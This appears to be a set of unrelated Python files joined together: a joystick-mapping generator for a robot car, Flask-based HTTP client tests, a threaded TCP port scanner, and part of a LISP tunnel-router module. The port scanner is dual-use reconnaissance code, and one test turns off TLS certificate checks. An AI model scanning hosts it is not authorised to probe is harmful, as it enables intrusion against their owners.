classname = "MyJoystick"
file_header = \
'''
from robopilot.parts.controller import Joystick, JoystickController
class %s(Joystick):
#An interface to a physical joystick available at /dev/input/js0
def __init__(self, *args, **kwargs):
super(%s, self).__init__(*args, **kwargs)
\n''' % (classname, classname )
outfile.write(file_header)
outfile.write(' self.button_names = {\n')
for key, value in self.js.button_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_names = {\n')
for key, value in self.js.axis_names.items():
outfile.write(" %s : '%s',\n" % (str(hex(key)), str(value)))
outfile.write(' }\n\n\n')
js_controller = \
'''
class %sController(JoystickController):
#A Controller object that maps inputs to actions
def __init__(self, *args, **kwargs):
super(%sController, self).__init__(*args, **kwargs)
def init_js(self):
#attempt to init joystick
try:
self.js = %s(self.dev_fn)
self.js.init()
except FileNotFoundError:
print(self.dev_fn, "not found.")
self.js = None
return self.js is not None
def init_trigger_maps(self):
#init set of mapping from buttons to function calls
\n''' % (classname, classname, classname)
outfile.write(js_controller)
outfile.write(' self.button_down_trigger_map = {\n')
for button, control in self.mapped_controls:
outfile.write(" '%s' : self.%s,\n" % (str(button), str(control)))
outfile.write(' }\n\n\n')
outfile.write(' self.axis_trigger_map = {\n')
for axis, control in self.axis_map:
outfile.write(" '%s' : self.%s,\n" % (str(axis), str(control)))
outfile.write(' }\n\n\n')
outfile.close()
print(pyth_filename, "written.")
def map_control_axis(self, control_name, control_fn):
while True:
axis = self.get_axis_action('Move the controller axis you wish to use for %s. Continue moving for 2 seconds.' % control_name)
mapped = False
if axis is None:
print("No mapping for %s." % control_name)
else:
#print("axis", axis)
code = self.get_code_from_button(axis)
for key, value in self.js.axis_names.items():
#print('key', key, 'value', value)
if key == code or value == code:
print('Mapping %s to %s.\n' % (value, control_name))
mapped = value
break
if mapped:
ret = input('Is this mapping ok? (y, N) ')
if ret.upper() == 'Y':
self.axis_map.append((mapped, control_fn))
return
else:
ret = input('axis not recognized. try again? (Y, n) ')
if ret.upper() == 'N':
return
def map_steering_throttle(self):
self.axis_map = []
self.print_config()
print()
print('Now we will create a mapping of controls to actions.\n')
print("First steering.")
self.map_control_axis("steering", "set_steering")
self.clear_scr()
self.print_config()
print()
print("Next throttle.")
self.map_control_axis("throttle", "set_throttle")
def map_button_controls(self):
unmapped_controls = [\
('toggle_mode','changes the drive mode between user, local, and local_angle'),
('erase_last_N_records','erases the last 100 records while driving'),
('emergency_stop','executes a full back throttle to bring car to a quick stop'),
('increase_max_throttle','increases the max throttle, also used for constant throttle val'),
('decrease_max_throttle','decreases the max throttle, also used for constant throttle val'),
('toggle_constant_throttle', 'toggle the mode of supplying constant throttle'),
('toggle_manual_recording','toggles recording records on and off')
]
self.mapped_controls = []
self.print_config()
print()
print("Next we are going to assign button presses to controls.")
print()
while len(unmapped_controls) > 0:
pt = PrettyTable()
pt.field_names = ['Num', 'Control', 'Help']
print("Unmapped Controls:")
for i, td in enumerate(unmapped_controls):
control, help = td
pt.add_row([i + 1, control, help])
print(pt)
print()
try:
ret = " "
while (not ret.isdigit() and ret.upper() != 'D') or (ret.isdigit() and (int(ret) < 1 or int(ret) > len(unmapped_controls))):
ret = input("Press the number of control to map (1-%d). D when done. " % len(unmapped_controls))
if ret.upper() == 'D':
break
iControl = int(ret) - 1
except:
continue
print('Press the button to map to control:', unmapped_controls[iControl][0])
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds.")
ret = input("Keep mapping commands? [Y, n]")
if ret == 'n':
break
else:
code = self.get_code_from_button(self.last_button)
if code in self.js.button_names:
button_name = self.js.button_names[code]
else:
button_name = self.last_button
self.mapped_controls.append((button_name, unmapped_controls[iControl][0]))
unmapped_controls.pop(iControl)
self.clear_scr()
self.print_config()
print()
print('done mapping controls')
print()
def revisit_topic(self):
done = False
while not done:
self.clear_scr()
self.print_config()
print("Now we are nearly done! Are you happy with this config or would you like to revisit a topic?")
print("H)appy, please continue to write out python file.")
print("B)uttons need renaming.")
print("A)xes need renaming.")
print("T)hrottle and steering need remap.")
print("R)emap buttons to controls.")
ret = input("Select option ").upper()
if ret == 'H':
done = True
elif ret == 'B':
self.name_buttons()
elif ret == 'A':
self.name_axes()
elif ret == 'T':
self.map_steering_throttle()
elif ret == 'R':
self.map_button_controls()
def get_axis_action(self, prompt):
done = False
while not done:
print(prompt)
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
return None
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
return None
else:
continue
else:
return most_movement
def shutdown(self):
self.running = False
if self.thread:
self.thread = None
def parse_args(self, args):
parser = argparse.ArgumentParser(prog='createjs', usage='%(prog)s [options]')
parsed_args = parser.parse_args(args)
return parsed_args
def run(self, args):
args = self.parse_args(args)
try:
self.create_joystick(args)
except KeyboardInterrupt:
self.shutdown()
|
test_http_client.py | from mock_decorators import setup, teardown
from flask import Flask, request
from threading import Thread
import urllib2
import os
import ssl
import time
@setup('HTTP GET & POST requests')
def setup_http_get(e):
app = Flask(__name__)
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/shutdown')
def shutdown():
shutdown_server()
return 'Server shutting down...'
@app.route("/", methods = ['GET', 'POST'])
def root():
print('Got data: ' + request.data);
return 'hello!!!'
@app.route("/data")
def get_data():
size = int(request.args['size'])
return 'a'*size
def flaskThread():
app.run(host='0.0.0.0', port=8088)
th = Thread(target=flaskThread)
th.start()
@teardown('HTTP GET & POST requests')
def teardown_http_get(e):
response = urllib2.urlopen('http://localhost:8088/shutdown')
html = response.read()
time.sleep(30)
@setup('HTTPS GET request')
def setup_http_get(e):
app = Flask(__name__)
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/shutdown')
def shutdown():
shutdown_server()
return 'Server shutting down...'
@app.route("/")
def root():
return 'hello!!!'
@app.route("/data")
def get_data():
size = int(request.args['size'])
return 'a'*size
def flaskThread():
p = os.path.dirname(os.path.abspath(__file__))
context = (p + '/server.crt', p + '/server.key')
print(context)
app.run(host='0.0.0.0', port=8088, ssl_context=context)
th = Thread(target=flaskThread)
th.start()
@teardown('HTTPS GET request')
def teardown_http_get(e):
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
p = os.path.dirname(os.path.abspath(__file__))
response = urllib2.urlopen('https://localhost:8088/shutdown', context=ctx)
html = response.read()
|
portscanner_clean.py | # ! Requires python 3.6 and up
from socket import * #Imports everything from socket library
from threading import * #Imports everything from threading library
import argparse as argp #Import argparse as argp for arguement parsing
from termcolor import colored as clrd #Import color text to the output, not neccessary but helps easily seeing the data
def connScan(tgtHost, tgtPort): # Note: Does the port scanning
try:
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((tgtHost, tgtPort))
print(clrd(f"[+] Port {tgtPort} for tcp is Open", 'green'))
except:
print(clrd(f"[-] Port {tgtPort} for tcp is Closed", 'red'))
finally:
sock.close()
def portScan(tgtHost, tgtPorts): # Note: Does the Parsing and Threading if multiple ports
try:
tgtIP = gethostbyname(tgtHost)
except:
print (f"Unknown Host {tgtHost} ")
try:
tgtName = gethostbyaddr(tgtIP)
print (f"Scan Results for: {tgtName[0]}")
except:
print (f"Scan Results for: {tgtIP}")
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = argp.ArgumentParser(description="Usage of program: " + "-H <target host> -p <target port>")
parser.add_argument("-H", "--Host", dest="tgtHost", metavar="", required=True, help="Specify Target Host.")
parser.add_argument("-p", "--Port", dest="tgtPort", metavar="", required=True, help="Specify Target Port for multiple ports separate by comma.")
options = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(",")
if (tgtHost == None) | (tgtPorts[0] == None):
print(clrd(parser.usage, 'cyan'))
# Note: Outputs "Usage of program: -H <target host> -p <target port>" if no parameters attached
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == "__main__":
main()
|
lisp-etr.py | #-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#------------------------------------------------------------------------------
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
global lisp_trigger_register_timer
global lisp_send_sockets
lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port)
#
# Trigger Map-Register when all databaase-mappings are configured.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
if (len(lisp.lisp_map_servers_list) > 0):
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
#
# Show local found RLOCs.
#
output = lispconfig.lisp_show_myrlocs("")
#
# Show decapsulation stats.
#
output = lispconfig.lisp_show_decap_stats(output, "ETR")
#
# Show configured map-servers.
#
dns_suffix = lisp.lisp_decent_dns_suffix
if (dns_suffix == None):
dns_suffix = ":"
else:
dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
#endif
hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
title = lisp.lisp_span(title, hover)
hover = ("P = proxy-reply requested, M = merge-registrations " + \
"requested, N = Map-Notify requested")
reg_title = lisp.lisp_span("Registration<br>flags", hover)
output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
"xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
"Map-Notifies<br>Received")
for ms in lisp.lisp_map_servers_list.values():
ms.resolve_dns_name()
ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
addr_str = ms_name + ms.map_server.print_address_no_iid()
if (ms.dns_name): addr_str += "<br>" + ms.dns_name
xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
"M" if ms.merge_registrations else "m",
"N" if ms.want_map_notify else "n",
"R" if ms.refresh_registrations else "r")
registers_sent = ms.map_registers_sent + \
ms.map_registers_multicast_sent
output += lispconfig.lisp_table_row(addr_str,
"sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
xtr_id, ms.site_id, flags, registers_sent,
ms.map_notifies_received)
#endfor
output += lispconfig.lisp_table_footer()
#
# Show database-mappings configured.
#
output = lispconfig.lisp_show_db_list("ETR", output)
#
# Show ELP configuration, if it exists.
#
if (len(lisp.lisp_elp_list) != 0):
output = lispconfig.lisp_show_elp_list(output)
#endif
#
# Show RLE configuration, if it exists.
#
if (len(lisp.lisp_rle_list) != 0):
output = lispconfig.lisp_show_rle_list(output)
#endif
#
# Show JSON configuration, if it exists.
#
if (len(lisp.lisp_json_list) != 0):
output = lispconfig.lisp_show_json_list(output)
#endif
#
# Show group-mappings, if they exist.
#
if (len(lisp.lisp_group_mapping_list) != 0):
title = "Configured Group Mappings:"
output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
"Sources", "Use MS")
for gm in lisp.lisp_group_mapping_list.values():
sources = ""
for s in gm.sources: sources += s + ", "
if (sources == ""):
sources = "*"
else:
sources = sources[0:-2]
#endif
output += lispconfig.lisp_table_row(gm.group_name,
gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
#endfor
output += lispconfig.lisp_table_footer()
#endif
return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ETR"))
#enddef
#
# lisp_map_server_command
#
# Store configured map-servers.
#
def lisp_map_server_command(kv_pairs):
global lisp_trigger_register_timer
global lisp_etr_info_timer
addresses = []
dns_names = []
key_id = 0
alg_id = 0
password = ""
proxy_reply = False
merge = False
refresh = False
want = False
site_id = 0
ms_name = None
ekey_id = 0
ekey = None
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for i in range(len(value)):
addresses.append(value[i])
#endfor
#endif
if (kw == "dns-name"):
for i in range(len(value)):
dns_names.append(value[i])
#endfor
#endif
if (kw == "authentication-type"):
alg_id = lisp.LISP_SHA_1_96_ALG_ID if (value == "sha1") else \
lisp.LISP_SHA_256_128_ALG_ID if (value == "sha2") else ""
#endif
if (kw == "authentication-key"):
if (alg_id == 0): alg_id = lisp.LISP_SHA_256_128_ALG_ID
auth_key = lisp.lisp_parse_auth_key(value)
key_id = auth_key.keys()[0]
password = auth_key[key_id]
#endif
if (kw == "proxy-reply"):
proxy_reply = True if value == "yes" else False
#endif
if (kw == "merge-registrations"):
merge = True if value == "yes" else False
#endif
if (kw == "refresh-registrations"):
refresh = True if value == "yes" else False
#endif
if (kw == "want-map-notify"):
want = True if value == "yes" else False
#endif
if (kw == "site-id"):
site_id = int(value)
#endif
if (kw == "encryption-key"):
ekey = lisp.lisp_parse_auth_key(value)
ekey_id = ekey.keys()[0]
ekey = ekey[ekey_id]
#Endif
#endfor
#
# Store internal data structure.
#
ms = None
for addr_str in addresses:
if (addr_str == ""): continue
ms = lisp.lisp_ms(addr_str, None, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
for name in dns_names:
if (name == ""): continue
ms = lisp.lisp_ms(None, name, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
#
# Trigger a Info-Request if we are doing NAT-traversal if this is the
# first Map-Server..
#
first_ms = (len(lisp.lisp_map_servers_list) == 1)
if (first_ms):
ms = lisp.lisp_map_servers_list.values()[0]
lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
[ms.map_server])
lisp_etr_info_timer.start()
else:
#
# Trigger Map-Register to newly configured Map-Server.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (ms and len(lisp.lisp_db_list) > 0):
lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
#endif
#endif
#
# Handle case where "lisp database-mapping" comes before "lisp map-server"
# in configuration file. We have to start periodic timer.
#
if (len(lisp.lisp_db_list) > 0):
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
return
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
sources = []
group_prefix = None
rle_address = None
ms_name = "all"
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "group-name"):
group_name = value
#endif
if (kw == "group-prefix"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.store_prefix(value)
#endif
if (kw == "instance-id"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.instance_id = int(value)
#endif
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for source in value:
if (source != ""): sources.append(source)
#endfor
#endif
if (kw == "rle-address"):
if (rle_address == None):
rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
rle_address.store_address(value)
#endif
#endfor
gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
rle_address)
gm.add_group()
return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
#
# Don't include RTR-list if there is no NAT in the path but nat-traversal
# is configured and NAT in path is tested. When there is a NAT, include
# all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
# array element is None, then the RTR is down and should be excluded in
# the list to register.
#
rtr_list = {}
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
for rtr_str in lisp.lisp_rtr_list:
rtr = lisp.lisp_rtr_list[rtr_str]
if (lisp.lisp_register_all_rtrs == False and rtr == None):
lisp.lprint(" Exclude unreachable RTR {}".format( \
lisp.red(rtr_str, False)))
continue
#endif
if (rtr == None): continue
rtr_list[rtr_str] = rtr
#endif
break
#endfor
count = 0
eid_records = ""
for iid in [eid.instance_id] + eid.iid_list:
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
eid_record.authoritative = True
eid_record.record_ttl = ttl
eid_record.eid.copy_address(eid)
eid_record.eid.instance_id = iid
eid_record.eid.iid_list = []
eid_record.group.copy_address(group)
eid_records += eid_record.encode()
if (not quiet):
prefix_str = lisp.lisp_print_eid_tuple(eid, group)
decent_index = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid)
decent_index = lisp.bold(str(decent_index), False)
decent_index = ", decent-index {}".format(decent_index)
#endif
lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
lisp.green(prefix_str, False), db.use_ms_name, decent_index))
eid_record.print_record(" ", False)
#endif
for rloc_entry in db.rloc_set:
rloc_record = lisp.lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = rloc_entry.rloc.is_local()
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" ")
#endfor
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in rtr_list.values():
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" RTR ")
#endfor
#
# Return to caller number of EID records written to returned buffer.
#
count += 1
#endfor
return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
#
# No database-mapping entries.
#
if (eid_only != None):
db_list_len = 1
else:
db_list_len = lisp.lisp_db_list_length()
if (db_list_len == 0): return
#endif
lisp.lprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
#
# Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
#
decent = lisp.lisp_decent_pull_xtr_configured()
#
# Go quiet with debug output when there are a lot of EID-records.
#
quiet = (db_list_len > 12)
ms_list = {}
if (decent):
#
# If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
# decide which map-server this EID belongs too (and is registered with.
#
for db in lisp.lisp_db_list:
eid = db.eid if db.group.is_null() else db.group
dns_name = lisp.lisp_get_decent_dns_name(eid)
ms_list[dns_name] = []
#endfor
else:
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_list[ms.ms_name] = []
#endfor
#endif
#
# Create data structure instances to build Map-Regiser message.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
#
# Traverse the databas-mapping associative array.
#
for db in lisp.lisp_db_list:
if (decent):
ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
else:
ms_dns_name = db.use_ms_name
#endif
#
# Is db entry associated with a map-server name that is not
# configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
msl = ms_list[ms_dns_name]
if (msl == []):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
else:
msl = ms_list[ms_dns_name][-1]
#endif
#
# If dynamic-EIDs are discovered, add each of them to EID-records,
# unless, we are doing a trigger in which case a single dynamic-EID
# is built into an EID-record.
#
# Otherwise, add static EID-prefixes into EID-records, unless a single
# one is triggered.
#
eid_records = ""
if (db.dynamic_eid_configured()):
for dyn_eid in db.dynamic_eids.values():
eid = dyn_eid.dynamic_eid
if (eid_only == None or eid_only.is_exact_match(eid)):
records, count = lisp_build_map_register_records(quiet, db,
eid, db.group, ttl)
eid_records += records
msl[1] += count
#endif
#endfor
else:
if (eid_only == None):
eid_records, count = lisp_build_map_register_records(quiet, db,
db.eid, db.group, ttl)
msl[1] += count
#endif
#endif
#
# Add EID-records to correct map-server name set.
#
msl[0] += eid_records
if (msl[1] == 20 or len(msl[0]) > 1100):
msl = ["", 0]
ms_list[ms_dns_name].append(msl)
#endif
#endfor
#
# Send Map-Register to each configured map-server.
#
for ms in lisp.lisp_map_servers_list.values():
if (ms_only != None and ms != ms_only): continue
ms_dns_name = ms.dns_name if decent else ms.ms_name
if (ms_list.has_key(ms_dns_name) == False): continue
for msl in ms_list[ms_dns_name]:
#
# Build map-server specific fields.
#
map_register.record_count = msl[1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.proxy_reply_requested = ms.proxy_reply
map_register.merge_register_requested = ms.merge_registrations
map_register.map_notify_requested = ms.want_map_notify
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
if (ms.refresh_registrations):
map_register.map_register_refresh = refresh
#endif
if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id("")
eid_records = msl[0]
packet = packet + eid_records + trailer
ms.map_registers_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
time.sleep(.001)
#endfor
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Exit loop if we are triggering a Map-Register to a single
# Map-Server.
#
if (ms_only != None and ms == ms_only): break
#endfor
return
#enddef
#
# lisp_etr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_etr_process_info_timer(ms):
global lisp_etr_info_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_socket, lisp_ephem_socket, lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, ms, lisp.LISP_CTRL_PORT)
#
# Build Info-Request for RTRs so we can open up NAT state so RTRs
# can encapsulate to us when ETR is behind NAT.
#
allow_private = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
if (rtr.is_private_address() and allow_private == False):
r = lisp.red(rtr.print_address_no_iid(), False)
lisp.lprint("Skip over RTR private address {}".format(r))
continue
#endif
lisp.lisp_build_info_requests(sockets, rtr, lisp.LISP_DATA_PORT)
#endfor
#
# Restart periodic timer. For some reason only this timer has to be
# canceled. Found on while testing NAT-traversal on rasp-pi in Jul 2015.
#
lisp_etr_info_timer.cancel()
lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
return
#enddef
#
# lisp_process_register_timer
#
# Time to send a periodic Map-Register.
#
def lisp_process_register_timer(lisp_sockets):
global lisp_register_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build and send Map-Register.
#
lisp_build_map_register(lisp_sockets, None, None, None, True)
#
# If we are are doing L2-overlays, then register as a join of the
# broadcast MAC address.
#
if (lisp.lisp_l2_overlay):
entry = [ None, "ffff-ffff-ffff", True ]
lisp_send_multicast_map_register(lisp_sockets, [entry])
#endif
#
# Restart periodic timer.
#
if (lisp_register_timer): lisp_register_timer.cancel()
lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
length = len(entries)
if (length == 0): return
afi = None
if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
if (afi == None):
lisp.lprint("lisp_send_multicast_map_register() invalid group address")
return
#endif
#
# Find all (*,G) entries in entries array and replace with (S,G) entries
# from lisp_group_mapping_list. The comment to avoid the source check
# is there so we can build a g_entry that can validate against group
# mappings. Have to fix to allow different sources for the same G when
# (S,G) is reported.
#
g_entries = []
for source, group, joinleave in entries:
# if (source != None): continue
g_entries.append([group, joinleave])
#endfor
decent = lisp.lisp_decent_pull_xtr_configured()
ms_list = {}
entries = []
for group, joinleave in g_entries:
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None):
lisp.lprint("No group-mapping for {}, could be underlay group". \
format(group))
continue
#endif
lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))
iid = ms_gm.group_prefix.instance_id
ms_name = ms_gm.use_ms_name
rle = ms_gm.rle_address
#
# To obtain decent-index for a group address, just use group address
# and no source as part of hash. Because an ITR does not know if (*,G)
# or (S,G) is registered with the mapping system
#
key = ms_name
if (decent):
key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
ms_list[key] = ["", 0]
#endif
if (len(ms_gm.sources) == 0):
entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
continue
#endif
for s in ms_gm.sources:
ms_list[key] = ["", 0]
entries.append([s, group, iid, key, rle, joinleave])
#endfor
#endfor
length = len(entries)
if (length == 0): return
lisp.lprint("Build Map-Register for {} multicast entries".format(length))
#
# Build RLE node for RLOC-record encoding. If behind a NAT, we need to
# insert a global address as the RLE node address. We will do that in
# the entries for loop.
#
rle_node = lisp.lisp_rle_node()
rle_node.level = 128
translated_rloc = lisp.lisp_get_any_translated_rloc()
rle = lisp.lisp_rle("")
rle.rle_nodes.append(rle_node)
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count. The ms_list
# is already setup for when pull-based decent is used.
#
if (decent == False):
for ms in lisp.lisp_map_servers_list.values():
ms_list[ms.ms_name] = ["", 0]
#endfor
#endif
rloc_name = None
if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname
#
# Count number of RTRs reachable so we know allocation count.
#
rtr_count = 0
for rtr in lisp.lisp_rtr_list.values():
if (rtr == None): continue
rtr_count += 1
#endfor
#
# Run through multicast entry array.
#
eid_records = ""
for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
#
# Is db entry associated with a map-server name that is not configured?
#
if (ms_list.has_key(ms_dns_name) == False): continue
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = 1 + rtr_count
eid_record.authoritative = True
eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
eid_record.group = lisp.lisp_address(afi, group, 0, iid)
if (eid_record.group.is_mac_broadcast() and \
eid_record.eid.address == 0): eid_record.eid.mask_len = 0
decent_index = ""
ms_name = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid_record.group)
decent_index = lisp.bold(str(decent_index), False)
decent_index = "with decent-index {}".format(decent_index)
else:
decent_index = "for ms-name '{}'".format(ms_dns_name)
#endif
eid_str = lisp.green(eid_record.print_eid_tuple(), False)
lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
decent_index))
eid_records += eid_record.encode()
eid_record.print_record(" ", False)
